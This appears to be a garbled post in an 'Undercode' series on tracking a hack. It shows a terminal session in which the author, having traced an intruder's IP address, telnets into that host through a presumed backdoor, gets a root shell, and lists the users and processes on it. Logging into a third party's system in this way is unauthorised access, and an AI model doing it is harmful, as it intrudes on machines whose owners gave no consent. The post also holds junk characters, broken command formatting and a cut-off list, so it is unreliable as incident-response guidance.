% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f % .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% c% c% c% .f |% p
# @@ h
========================================

🦑 From the above we know that the hack was attacked from 210.217.237.75. According to habits, usually the same backdoor is done, so
[root @ ns man] # export DISPLAY = \ "l4m3r0x \"
[root @ ns man] # telnet 210.217.237.75
Trying 210.217.237.75 ...
Connected to 210.217.237.75.
Escape character is \^]\.

> Boramae Cache Server 3.5.1

bash# w
> 7:48pm up 71 days, 9:43, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 25Nov 0 31days 0.08s 0.05s -bash
undercode testing root
bash# ps -ef
PID TTY STAT TIME COMMAND
940 2 S 0:00 /sbin/mingetty tty2 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
941 3 S 0:00 /sbin/mingetty tty3 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
942 4 S 0:00 /sbin/mingetty tty4 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
943 5 S 0:00 / sbin / mingetty tty5 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
944 6 S 0:00 / sbin / mingetty tty6 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
957 1 S 0:00 -bash HOME = / root PATH = / sbin: / bin: / usr / sbin: / usr / bin SHELL = /
22151? S 0:00 -bash HOME = / root USER = root LOGNAME = root PATH = / usr / bin: / bin:
22178? S 0:00 \\ _ ../ssh -l pthl mega.ee.tu-berlin.de LESSOPEN = | / usr / bin /
. . . . . . . . . .

3) Use the rpm command to see if often used commands are modified

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 TRACKING A HACK FULL BY UNDERCODE